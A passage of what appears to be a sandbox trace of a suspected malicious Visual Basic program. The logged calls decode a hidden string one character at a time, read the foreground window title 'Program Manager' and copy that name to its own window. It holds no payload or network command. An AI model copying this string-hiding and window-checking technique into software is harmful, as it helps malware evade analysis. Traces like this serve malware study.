lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.717] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.717] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.718] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.718] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.719] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.719] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.720] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.720] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.721] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.721] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.721] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.722] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.722] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.723] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.724] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.724] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.725] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.725] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.726] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.726] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.728] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.728] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.729] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.729] GetForegroundWindow () returned 0x20086 [0180.729] GetLastError () returned 0x0 [0180.729] SysStringLen (param_1=" ") returned 0xff [0180.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.729] SysStringLen (param_1=" ") returned 0xff [0180.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.730] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.730] GetLastError () returned 0x0 [0180.730] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.730] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.730] SysStringLen (param_1="Program Manager") returned 0x10 [0180.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x11470b4, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0180.731] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0180.731] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.731] GetFocus () returned 0x0 [0180.731] lstrlenA (lpString="Program Manager") returned 15 [0180.731] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470b4) returned 0x1 [0180.732] IsWindow (hWnd=0x103c4) returned 1 [0180.732] IsWindow (hWnd=0x103c4) returned 1 [0180.741] IsWindow (hWnd=0x103c4) returned 1 [0180.741] IsWindow (hWnd=0x103c4) returned 1 [0180.742] GetFocus () returned 0x0 [0180.742] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0180.742] GetFocus () returned 0x0 [0180.742] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0180.742] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0180.742] GetFocus () returned 0x0 [0180.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0180.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x11470b4, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0180.743] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0180.743] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.744] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.745] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.745] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.745] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.746] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.746] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.747] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.747] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.748] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.748] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.749] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.749] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.750] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.750] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.751] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.751] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.752] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.752] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.753] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.753] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.754] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.754] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.755] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.755] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.756] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.756] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.757] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.805] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.805] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.805] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.806] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.806] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.807] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.807] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.808] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.808] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.808] MultiByteToWideChar (in: 